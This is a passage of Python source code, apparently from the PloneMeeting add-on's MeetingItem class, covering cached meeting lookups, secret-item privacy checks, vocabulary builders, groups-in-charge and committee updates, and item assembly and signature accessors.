exists.'''\n res = None\n if only_uid:\n res = getattr(self, 'linked_meeting_uid', None)\n else:\n meeting_path = getattr(self, 'linked_meeting_path', None)\n if meeting_path:\n if caching and hasattr(self, \"REQUEST\"):\n meeting_uid = getattr(self, 'linked_meeting_uid', None)\n res = self.REQUEST.get('meeting__%s' % meeting_uid)\n if not res:\n portal = api.portal.get()\n res = portal.unrestrictedTraverse(meeting_path)\n if caching and hasattr(self, \"REQUEST\"):\n self.REQUEST.set('meeting__%s' % meeting_uid, res)\n return res\n\n def getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath_cachekey(method, self):\n '''cachekey method for self.getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath.'''\n # valid until a meeting was modified (date or review_state)\n # and when preferredMeeting is still the same\n date_date = get_cachekey_volatile('Products.PloneMeeting.Meeting.date')\n date_review_state = get_cachekey_volatile('Products.PloneMeeting.Meeting.review_state')\n return repr(self), self.getPreferredMeeting(), date_date, date_review_state\n\n @ram.cache(getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath_cachekey)\n def getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath(self):\n \"\"\"Cached method used by getMeetingToInsertIntoWhenNoCurrentMeetingObject.\"\"\"\n res = None\n # first, find meetings in the future still accepting items\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # do a list with meetingStates so it is not considered as a tuple by getMeetingsAcceptingItems\n # indeed, in some case the tuple ('created', 'frozen') behaves specifically\n meetingStates = list(cfg.getMeetingPresentItemWhenNoCurrentMeetingStates())\n brains = []\n preferredMeeting = self.getPreferredMeeting()\n if preferredMeeting != ITEM_NO_PREFERRED_MEETING_VALUE:\n # preferredMeeting, try to get it from meetingsAcceptingItems or\n # use meetingsAcceptingItems in the future\n brains = cfg.getMeetingsAcceptingItems(review_states=meetingStates)\n brains = [brain for brain in brains if brain.UID == preferredMeeting]\n\n # extend brains with other meetings accepting items, this way if preferred meeting\n # does not accept items, we will have other possibilities\n # no preferredMeeting or it was not found in meetingsAcceptingItems\n # take into account meetings in the future\n brains += list(cfg.getMeetingsAcceptingItems(\n review_states=meetingStates, inTheFuture=True))\n\n for brain in brains:\n meeting = brain.getObject()\n # find a meeting that is really accepting current item\n # in case meeting is frozen, make sure current item isLateFor(meeting)\n # also in case no meetingStates, a closed meeting could be returned, check\n # that current user may edit returned meeting\n if meeting.wfConditions().may_accept_items() and \\\n (not meeting.is_late() or self.wfConditions().isLateFor(meeting)):\n res = meeting\n break\n return res and \"/\".join(res.getPhysicalPath())\n\n def getMeetingToInsertIntoWhenNoCurrentMeetingObject(self):\n '''Return the meeting the item will be inserted into in case the 'present'\n transition from another view than the meeting view. This will take into\n acount meeting states defined in MeetingConfig.meetingPresentItemWhenNoCurrentMeetingStates.'''\n meeting_path = self.getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath()\n meeting = None\n if meeting_path:\n portal = api.portal.get()\n meeting = portal.unrestrictedTraverse(meeting_path)\n return meeting\n\n def _getOtherMeetingConfigsImAmClonedIn(self):\n '''Returns a list of meetingConfig ids self has been cloned to'''\n ann = IAnnotations(self)\n res = []\n for k in ann:\n if k.startswith(SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY):\n res.append(k.replace(SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY, ''))\n return res\n\n def isPrivacyViewable_cachekey(method, self):\n '''cachekey method for self.isPrivacyViewable.'''\n item = self.getSelf()\n if item.getPrivacy().startswith('public'):\n return True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not cfg.getRestrictAccessToSecretItems() or tool.isManager(cfg):\n return True\n date = get_cachekey_volatile('_users_groups_value')\n return repr(item), item.modified(), get_plone_groups_for_user(), date\n\n security.declarePublic('isPrivacyViewable')\n\n @ram.cache(isPrivacyViewable_cachekey)\n def isPrivacyViewable(self):\n '''Check doc in interfaces.py.'''\n # Checking the 'privacy condition' is only done if privacy is 'secret'.\n item = self.getSelf()\n privacy = item.getPrivacy()\n # 'public' or 'public_heading' items\n if privacy.startswith('public'):\n return True\n # check if privacy needs to be checked...\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not cfg.getRestrictAccessToSecretItems():\n return True\n # Bypass privacy check for (Meeting)Manager\n if tool.isManager(cfg):\n return True\n\n # now check if among local_roles, a role is giving view access to the item\n # for a group that current user is member of except powerobservers groups\n userGroups = get_plone_groups_for_user()\n po_suffixes = tuple(po['row_id'] for po in cfg.getPowerObservers())\n itemUserRoles = [roles for group_id, roles in item.__ac_local_roles__.items()\n if group_id in userGroups and not group_id.endswith(po_suffixes)]\n # merge lists and remove duplicates\n itemUserRoles = set(list(itertools.chain.from_iterable(itemUserRoles)))\n if itemUserRoles.intersection(item._View_Permission):\n return True\n\n # check if current user is a power observer in MeetingConfig.restrictAccessToSecretItemsTo\n restricted_power_obs = cfg.getRestrictAccessToSecretItemsTo()\n if restricted_power_obs and \\\n tool.isPowerObserverForCfg(cfg, power_observer_types=restricted_power_obs):\n return False\n\n # a power observer not in restrictAccessToSecretItemsTo?\n if tool.isPowerObserverForCfg(cfg):\n return True\n\n def isViewable(self):\n \"\"\" \"\"\"\n return _checkPermission(View, self)\n\n security.declarePublic('getAllCopyGroups')\n\n def getAllCopyGroups(self, auto_real_plone_group_ids=False):\n \"\"\"Return manually selected copyGroups and automatically added ones.\n If p_auto_real_plone_group_ids is True, the real Plone group id is returned for\n automatically added groups instead of the AUTO_COPY_GROUP_PREFIX prefixed name.\"\"\"\n allGroups = self.getCopyGroups()\n if auto_real_plone_group_ids:\n allGroups += tuple([self._realCopyGroupId(plone_group_id)\n for plone_group_id in self.autoCopyGroups])\n else:\n allGroups += tuple(self.autoCopyGroups)\n return allGroups\n\n def check_copy_groups_have_access(self):\n \"\"\"Return True if copyGroups have access in current review_state.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return self.query_state() in cfg.getItemCopyGroupsStates()\n\n security.declarePublic('checkPrivacyViewable')\n\n def checkPrivacyViewable(self):\n '''Raises Unauthorized if the item is not privacy-viewable.'''\n if not self.adapted().isPrivacyViewable():\n raise Unauthorized\n\n security.declarePublic('getExtraFieldsToCopyWhenCloning')\n\n def getExtraFieldsToCopyWhenCloning(self, cloned_to_same_mc, cloned_from_item_template):\n '''Check doc in interfaces.py.'''\n return []\n\n security.declarePrivate('listMeetingsAcceptingItems')\n\n def listMeetingsAcceptingItems(self):\n '''Returns the (Display)list of meetings returned by\n MeetingConfig.getMeetingsAcceptingItems.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n # while passing empty review_states, it is computed depending\n # on fact that current user isManager or not\n for meetingBrain in cfg.getMeetingsAcceptingItems(review_states=[]):\n meetingDate = tool.format_date(meetingBrain.meeting_date, with_hour=True)\n meetingState = translate(meetingBrain.review_state,\n domain=\"plone\",\n context=self.REQUEST)\n res.append((meetingBrain.UID,\n u\"{0} ({1})\".format(meetingDate,\n meetingState)))\n # if one preferred meeting was already defined on self, add it\n # to the vocabulary or editing an older item could loose that information\n preferredMeetingUID = self.getPreferredMeeting()\n # add it if we actually have a preferredMeetingUID stored\n # and if it is not yet in the vocabulary!\n if preferredMeetingUID and \\\n preferredMeetingUID != ITEM_NO_PREFERRED_MEETING_VALUE and \\\n preferredMeetingUID not in [meetingInfo[0] for meetingInfo in res]:\n # check that stored preferredMeeting still exists, if it\n # is the case, add it the the vocabulary\n brain = uuidToCatalogBrain(preferredMeetingUID, unrestricted=True)\n if brain:\n preferredMeetingDate = tool.format_date(\n brain.meeting_date, with_hour=True)\n preferredMeetingState = translate(brain.review_state,\n domain=\"plone\",\n context=self.REQUEST)\n res.append((brain.UID,\n u\"{0} ({1})\".format(preferredMeetingDate, preferredMeetingState)))\n res.reverse()\n res.insert(0, (ITEM_NO_PREFERRED_MEETING_VALUE, 'Any meeting'))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listMeetingTransitions')\n\n def listMeetingTransitions(self):\n '''Lists the possible transitions for meetings of the same meeting\n config as this item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = DisplayList(\n tuple((\n ('_init_',\n translate('_init_', domain=\"plone\", context=self.REQUEST)), ))\n )\n res += cfg.listMeetingTransitions()\n return res\n\n security.declarePrivate('listOtherMeetingConfigsClonableTo')\n\n def listOtherMeetingConfigsClonableTo(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], getattr(tool, mctct['meeting_config']).Title()))\n # make sure otherMeetingConfigsClonableTo actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMeetingConfigsClonableTo = self.getOtherMeetingConfigsClonableTo()\n if otherMeetingConfigsClonableTo:\n otherMeetingConfigsClonableToInVocab = [term[0] for term in res]\n for meetingConfigId in otherMeetingConfigsClonableTo:\n if meetingConfigId not in otherMeetingConfigsClonableToInVocab:\n res.append((meetingConfigId, getattr(tool, meetingConfigId).Title()))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listOtherMeetingConfigsClonableToEmergency')\n\n def listOtherMeetingConfigsClonableToEmergency(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n translated_msg = translate('Emergency while presenting in other MC',\n domain='PloneMeeting',\n context=self.REQUEST)\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], translated_msg))\n # make sure otherMeetingConfigsClonableToEmergency actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMCsClonableToEmergency = self.getOtherMeetingConfigsClonableToEmergency()\n if otherMCsClonableToEmergency:\n otherMeetingConfigsClonableToEmergencyInVocab = [term[0] for term in res]\n for meetingConfigId in otherMCsClonableToEmergency:\n if meetingConfigId not in otherMeetingConfigsClonableToEmergencyInVocab:\n res.append((meetingConfigId, translated_msg))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listOtherMeetingConfigsClonableToPrivacy')\n\n def listOtherMeetingConfigsClonableToPrivacy(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n translated_msg = translate('Secret while presenting in other MC?',\n domain='PloneMeeting',\n context=self.REQUEST)\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], translated_msg))\n # make sure otherMeetingConfigsClonableToPrivacy actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMCsClonableToPrivacy = self.getOtherMeetingConfigsClonableToPrivacy()\n if otherMCsClonableToPrivacy:\n otherMeetingConfigsClonableToPrivacyInVocab = [term[0] for term in res]\n for meetingConfigId in otherMCsClonableToPrivacy:\n if meetingConfigId not in otherMeetingConfigsClonableToPrivacyInVocab:\n res.append((meetingConfigId, translated_msg))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listItemTags')\n\n def listItemTags(self):\n '''Lists the available tags from the meeting config.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for tag in cfg.getAllItemTags().split('\\n'):\n res.append((tag, tag))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listEmergencies')\n\n def listEmergencies(self):\n '''Vocabulary for the 'emergency' field.'''\n d = 'PloneMeeting'\n res = DisplayList((\n (\"no_emergency\", translate('no_emergency',\n domain=d,\n context=self.REQUEST)),\n (\"emergency_asked\", translate('emergency_asked',\n domain=d,\n context=self.REQUEST)),\n (\"emergency_accepted\", translate('emergency_accepted',\n domain=d,\n context=self.REQUEST)),\n (\"emergency_refused\", translate('emergency_refused',\n domain=d,\n context=self.REQUEST)),\n ))\n return res\n\n security.declarePrivate('listCompleteness')\n\n def listCompleteness(self):\n '''Vocabulary for the 'completeness' field.'''\n d = 'PloneMeeting'\n res = DisplayList((\n (\"completeness_not_yet_evaluated\", translate('completeness_not_yet_evaluated',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_complete\", translate('completeness_complete',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_incomplete\", translate('completeness_incomplete',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_evaluation_asked_again\", translate('completeness_evaluation_asked_again',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_evaluation_not_required\", translate('completeness_evaluation_not_required',\n domain=d,\n context=self.REQUEST)),\n ))\n return res\n\n security.declarePublic('hasMeeting')\n\n def hasMeeting(self):\n '''Is there a meeting tied to me?'''\n return self.getMeeting(only_uid=True) is not None\n\n security.declarePublic('isLate')\n\n def isLate(self):\n '''Am I a late item?'''\n return bool(self.getListType() == 'late')\n\n security.declarePrivate('getListTypeLateValue')\n\n def getListTypeLateValue(self, meeting):\n '''See doc in interfaces.py.'''\n return 'late'\n\n security.declarePrivate('getListTypeNormalValue')\n\n def getListTypeNormalValue(self, meeting):\n '''See doc in interfaces.py.'''\n return 'normal'\n\n security.declarePrivate('listCategories')\n\n def listCategories(self, classifiers=False):\n '''Returns a DisplayList containing all available active categories in\n the meeting config that corresponds me.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n catType = classifiers and 'classifiers' or 'categories'\n for cat in cfg.getCategories(catType=catType):\n res.append((cat.id, safe_unicode(cat.Title())))\n\n # make sure current category is listed here\n field_name = classifiers and \"classifier\" or \"category\"\n storedKeys = [elt[0] for elt in res]\n current_cat = self.getField(field_name).getAccessor(self)(theObject=True)\n if current_cat and not current_cat.getId() in storedKeys:\n res.append((current_cat.getId(), safe_unicode(current_cat.Title())))\n\n if field_name not in cfg.getItemFieldsToKeepConfigSortingFor():\n # natural sort, reverse tuple so we have value/key instead key/value\n # and realsorted may achieve his work\n res = [(elt[1], elt[0]) for elt in res]\n res = humansorted(res)\n res = [(elt[1], elt[0]) for elt in res]\n\n res.insert(0, ('_none_', translate('make_a_choice',\n domain='PloneMeeting',\n context=self.REQUEST)))\n return DisplayList(res)\n\n security.declarePrivate('listClassifiers')\n\n def listClassifiers(self):\n '''Returns a DisplayList containing all available active classifiers in\n the meeting config that corresponds me.'''\n return self.listCategories(classifiers=True)\n\n security.declarePublic('getCategory')\n\n def getCategory(self, theObject=False, **kwargs):\n '''Overrided accessor to be able to handle parameter p_theObject=False.'''\n cat_id = self.getField('category').get(self, **kwargs)\n return _get_category(self, cat_id, the_object=theObject)\n\n security.declarePublic('getClassifier')\n\n def getClassifier(self, theObject=False, **kwargs):\n '''Overrided accessor to be able to handle parameter p_theObject=False.'''\n cat_id = self.getField('classifier').get(self, **kwargs)\n return _get_category(self, cat_id, the_object=theObject, cat_type=\"classifiers\")\n\n security.declarePublic('getProposingGroup')\n\n def getProposingGroup(self, theObject=False, **kwargs):\n '''This redefined accessor may return the proposing group id or the real\n group if p_theObject is True.'''\n res = self.getField('proposingGroup').get(self, **kwargs) # = group id\n if res and theObject:\n res = uuidToObject(res, unrestricted=True)\n return res\n\n def getPreferredMeeting(self, theObject=False, caching=True, **kwargs):\n '''This redefined accessor may return the preferred meeting id or\n the real meeting if p_theObject is True.'''\n res = self.getField('preferredMeeting').get(self, **kwargs)\n if theObject:\n meeting_uid = res\n res = None\n if meeting_uid and meeting_uid != ITEM_NO_PREFERRED_MEETING_VALUE:\n preferred_meeting_path = getattr(self, 'preferred_meeting_path', None)\n if preferred_meeting_path:\n if caching and hasattr(self, \"REQUEST\"):\n res = self.REQUEST.get('preferred_meeting__%s' % meeting_uid)\n if not res:\n portal = api.portal.get()\n res = portal.unrestrictedTraverse(preferred_meeting_path)\n if caching and hasattr(self, \"REQUEST\"):\n self.REQUEST.set('preferred_meeting__%s' % meeting_uid, res)\n return res\n\n security.declarePublic('getGroupsInCharge')\n\n def getGroupsInCharge(self,\n theObjects=False,\n fromOrgIfEmpty=False,\n fromCatIfEmpty=False,\n first=False,\n includeAuto=True,\n **kwargs):\n '''Redefine field MeetingItem.groupsInCharge accessor to be able to return\n groupsInCharge id or the real orgs if p_theObjects is True.\n Default behaviour is to get the orgs stored in the groupsInCharge field.\n If p_first is True, we only return first group in charge.\n If p_includAuto is True, we will include auto computed groupsInCharge,\n so groupsInCharge defined in proposingGroup and category.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n res = list(self.getField('groupsInCharge').get(self, **kwargs)) # = org_uid\n\n if (not res and fromOrgIfEmpty) or \\\n (includeAuto and cfg.getIncludeGroupsInChargeDefinedOnProposingGroup()):\n proposingGroup = self.getProposingGroup(theObject=True)\n # maybe an item template defined in the MeetingConfig?\n if proposingGroup:\n org_groups_in_charge = [\n gic_uid for gic_uid in proposingGroup.get_groups_in_charge()\n if gic_uid not in res]\n if org_groups_in_charge:\n res += list(org_groups_in_charge)\n\n if (not res and fromCatIfEmpty) or \\\n (includeAuto and cfg.getIncludeGroupsInChargeDefinedOnCategory()):\n # consider category and classifier\n categories = []\n category = self.getCategory(theObject=True)\n if category:\n categories.append(category)\n classifier = self.getClassifier(theObject=True)\n if classifier:\n categories.append(classifier)\n for cat in categories:\n cat_groups_in_charge = [\n gic_uid for gic_uid in cat.get_groups_in_charge()\n if gic_uid not in res]\n if cat_groups_in_charge:\n res += list(cat_groups_in_charge)\n\n # avoid getting every organizations if first=True\n if res and first and theObjects:\n res = [res[0]]\n\n if theObjects:\n res = uuidsToObjects(res, ordered=True, unrestricted=True)\n\n if res and first:\n res = res[0]\n\n return res\n\n security.declarePublic('getAssociatedGroups')\n\n def getAssociatedGroups(self, theObjects=False, **kwargs):\n '''This redefined accessor may return associated group ids or the real\n groups if p_theObjects is True.'''\n res = self.getField('associatedGroups').get(self, **kwargs)\n if res and theObjects:\n return tuple(uuidsToObjects(uuids=res, ordered=True, unrestricted=True))\n return res\n\n security.declarePublic('fieldIsEmpty')\n\n def fieldIsEmpty(self, name):\n '''Is field named p_name empty ?'''\n return fieldIsEmpty(name, self)\n\n security.declarePublic('wfConditions')\n\n def wfConditions(self):\n '''Returns the adapter that implements the interface that proposes\n methods for use as conditions in the workflow associated with this\n item.'''\n return getWorkflowAdapter(self, conditions=True)\n\n security.declarePublic('wfActions')\n\n def wfActions(self):\n '''Returns the adapter that implements the interface that proposes\n methods for use as actions in the workflow associated with this\n item.'''\n return getWorkflowAdapter(self, conditions=False)\n\n security.declarePublic('adapted')\n\n def adapted(self):\n '''Gets the \"adapted\" version of myself. If no custom adapter is found,\n this method returns me.'''\n return getCustomAdapter(self)\n\n security.declarePublic('hasHistory')\n\n def hasHistory(self, fieldName=None):\n '''See doc in utils.py.'''\n return hasHistory(self, fieldName)\n\n def attribute_is_used_cachekey(method, self, name):\n '''cachekey method for self.attribute_is_used.'''\n return \"{0}.{1}\".format(self.portal_type, name)\n\n security.declarePublic('attribute_is_used')\n\n @ram.cache(attribute_is_used_cachekey)\n def attribute_is_used(self, name):\n '''Is the attribute named p_name used in this meeting config ?'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return (name in cfg.getUsedItemAttributes())\n\n def query_state_cachekey(method, self):\n '''cachekey method for self.query_state.'''\n return getattr(aq_base(self), 'workflow_history', {})\n\n security.declarePublic('query_state')\n\n # not ramcached perf tests says it does not change anything\n # and this avoid useless entry in cache\n # @ram.cache(query_state_cachekey)\n def query_state(self):\n '''In what state am I ?'''\n wfTool = api.portal.get_tool('portal_workflow')\n return wfTool.getInfoFor(self, 'review_state')\n\n security.declarePublic('getSelf')\n\n def getSelf(self):\n '''All MeetingItem methods that are overridable through a custom adapter\n can't make the assumption that p_self corresponds to a MeetingItem\n instance. Indeed, p_self may correspond to an adapter instance. Those\n methods can retrieve the MeetingItem instance through a call to\n m_getSelf.'''\n res = self\n if self.getTagName() != 'MeetingItem':\n res = self.context\n return res\n\n def _may_update_item_reference(self):\n '''See docstring in interfaces.py.'''\n may_update = False\n item = self.getSelf()\n if item.hasMeeting():\n may_update = True\n else:\n # manage reference for items out of meeting\n tool = api.portal.get_tool(\"portal_plonemeeting\")\n cfg = tool.getMeetingConfig(item)\n may_update = cfg.getComputeItemReferenceForItemsOutOfMeeting()\n return may_update\n\n security.declarePublic('update_item_reference')\n\n def update_item_reference(self, clear=False):\n '''Update the item reference, recompute it,\n stores it and reindex 'getItemReference'.\n This rely on _may_update_item_reference.'''\n res = ''\n if not clear and self.adapted()._may_update_item_reference():\n meeting = self.getMeeting()\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, 'meeting': meeting})\n cfg = extra_expr_ctx['cfg']\n # default raise_on_error=False so if the expression\n # raise an error, we will get '' for reference and a message in the log\n res = _evaluateExpression(self,\n expression=cfg.getItemReferenceFormat().strip(),\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx)\n # make sure we do not have None\n res = res or ''\n\n stored = self.getField('itemReference').get(self)\n if stored != res:\n self.setItemReference(res)\n idxs = self.adapted().getIndexesRelatedTo('item_reference')\n if idxs:\n # avoid update_metadata, we do not need to update modified neither\n reindex_object(self, idxs=idxs, update_metadata=0)\n return res\n\n def update_groups_in_charge(self):\n \"\"\"When MeetingConfig.includeGroupsInChargeDefinedOnProposingGroup or\n MeetingConfig.includeGroupsInChargeDefinedOnCategory is used,\n if MeetingItem.groupsInCharge is empty or\n \"need_MeetingItem_update_groups_in_charge_xxx\" is found in REQUEST,\n we will store corresponding groupsInCharge.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n gic_from_cat = cfg.getIncludeGroupsInChargeDefinedOnCategory()\n gic_from_pg = cfg.getIncludeGroupsInChargeDefinedOnProposingGroup()\n if (gic_from_cat or gic_from_pg) and \\\n (not self.groupsInCharge or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_category') and\n gic_from_cat) or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_classifier') and\n gic_from_cat) or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_proposing_group') and\n gic_from_pg)):\n # empty the groups_in_charge before updating it because\n # it is taken into account by getGroupsInCharge\n self.setGroupsInCharge([])\n groups_in_charge = self.getGroupsInCharge(includeAuto=True)\n self.setGroupsInCharge(groups_in_charge)\n\n def update_committees(self):\n \"\"\"Update committees automatically?\n This will be the case if :\n - \"committees\" field used;\n - no commitees selected on item of a parameter on item changed;\n - the item is not inserted into a meeting\n (this avoid changing old if configuration changed).\"\"\"\n indexes = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # warning, \"committees\" is in MeetingConfig.usedMeetingAttributes\n if \"committees\" in cfg.getUsedMeetingAttributes() and \\\n (not self.getCommittees() or self.REQUEST.get('need_MeetingItem_update_committees')) and \\\n not self.hasMeeting():\n if cfg.is_committees_using(\"auto_from\"):\n committees = []\n for committee in cfg.getCommittees(only_enabled=True):\n if \"proposing_group__\" + self.getProposingGroup() in committee[\"auto_from\"] or \\\n \"category__\" + self.getCategory() in committee[\"auto_from\"] or \\\n \"classifier__\" + self.getClassifier() in committee[\"auto_from\"]:\n committees.append(committee['row_id'])\n committees = committees or [NO_COMMITTEE]\n # only set committees if value changed\n if self.getCommittees() != committees:\n self.setCommittees(committees)\n indexes.append('committees_index')\n return indexes\n\n security.declarePublic('hasItemSignatures')\n\n def hasItemSignatures(self):\n '''Does this item define specific item signatures ?.'''\n return bool(self.getField('itemSignatures').get(self))\n\n security.declarePublic('getCertifiedSignatures')\n\n def getCertifiedSignatures(self,\n forceUseCertifiedSignaturesOnMeetingConfig=False,\n from_group_in_charge=False,\n listify=True):\n '''See docstring in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if forceUseCertifiedSignaturesOnMeetingConfig:\n return cfg.getCertifiedSignatures(computed=True, listify=listify)\n\n selected_group_in_charge = None\n if from_group_in_charge:\n selected_group_in_charge = item.getGroupsInCharge(\n theObjects=True, fromOrgIfEmpty=True, fromCatIfEmpty=True, first=True)\n # get certified signatures computed, this will return a list with pair\n # of function/signatures, so ['function1', 'name1', 'function2', 'name2', 'function3', 'name3', ]\n # this list is ordered by signature number defined on the organization/MeetingConfig\n return item.getProposingGroup(theObject=True).get_certified_signatures(\n computed=True, cfg=cfg, group_in_charge=selected_group_in_charge, listify=listify)\n\n def is_assembly_field_used(self, field_name):\n \"\"\"Helper method that return True if an assembly field is used\n or if it is filled (no more used, swtiched to contacts but filled on old items).\"\"\"\n res = False\n if self.hasMeeting():\n meeting = self.getMeeting()\n attr_names_mapping = {\"itemAssembly\": \"assembly\",\n \"itemAssemblyExcused\": \"assembly_excused\",\n \"itemAssemblyAbsents\": \"assembly_absents\",\n \"itemAssemblyGuests\": \"assembly_guests\",\n \"itemSignatures\": \"signatures\"}\n if meeting.attribute_is_used(attr_names_mapping[field_name]):\n res = True\n else:\n # maybe it was used before?\n accessor = self.getField(field_name).getAccessor(self)\n if accessor(real=True) or accessor(real=False):\n res = True\n return res\n\n security.declarePublic('redefinedItemAssemblies')\n\n def redefinedItemAssemblies(self):\n '''\n Helper method that returns list of redefined assembly attributes if assembly of item has been redefined,\n this is used on the item view. Depending on used item attributes (assembly, excused, absents, guests),\n if one of relevant attribute has been redefined, it will return True.\n '''\n res = []\n # check if assembly redefined\n if self.getItemAssembly(real=True):\n res.append('assembly')\n if self.getItemAssemblyExcused(real=True):\n res.append('assembly_excused')\n if self.getItemAssemblyAbsents(real=True):\n res.append('assembly_absents')\n if self.getItemAssemblyGuests(real=True):\n res.append('assembly_guests')\n # when using contacts\n if self.get_item_absents(the_objects=True):\n res.append('item_absents')\n if self.get_item_excused(the_objects=True):\n res.append('item_excused')\n if self.get_item_non_attendees(the_objects=True):\n res.append('item_non_attendees')\n return res\n\n security.declarePublic('getItemAssembly')\n\n def getItemAssembly(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly for this item.\n If no assembly is defined, meeting assembly is returned.'''\n res = self.getField('itemAssembly').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly(for_display=False)\n # make sure we always have unicode,\n # Meeting stored unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(\n res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyExcused')\n\n def getItemAssemblyExcused(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly excused for this item.\n If no excused are defined for item, meeting assembly excused are returned.'''\n res = self.getField('itemAssemblyExcused').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_excused(for_display=False)\n # make sure we always have unicode,\n # Meeting stored unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyAbsents')\n\n def getItemAssemblyAbsents(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly absents for this item.\n If no absents are defined for item, meeting assembly absents are returned.'''\n res = self.getField('itemAssemblyAbsents').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_absents(for_display=False)\n # make sure we always have unicode,\n # Meeting stored unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyGuests')\n\n def getItemAssemblyGuests(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly guests for this item.\n If no guests are defined for item, meeting assembly guests are returned.'''\n res = self.getField('itemAssemblyGuests').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_guests(for_display=False)\n # make sure we always have unicode,\n # Meeting stored unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemSignatures')\n\n def getItemSignatures(self,\n real=False,\n for_display=False,\n striked=False,\n mark_empty_tags=False,\n **kwargs):\n '''Gets the signatures for this item. If no signature is defined,\n meeting signatures are returned.'''\n res = self.getField('itemSignatures').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_signatures(for_display=False)\n # make sure we always have unicode,\n # Meeting stored unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('get_item_absents')\n\n def get_item_absents(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the absents for this item.\n Absent for an item are stored in the Meeting.item_absents dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_absents = meeting.get_item_absents().get(self.UID(), [])\n if ordered:\n meeting_item_absents = self._order_contacts(meeting_item_absents)\n if the_objects:\n item_absents = meeting._get_contacts(uids=meeting_item_absents, the_objects=the_objects)\n else:\n item_absents = tuple(meeting_item_absents)\n return item_absents\n\n security.declarePublic('get_item_excused')\n\n def 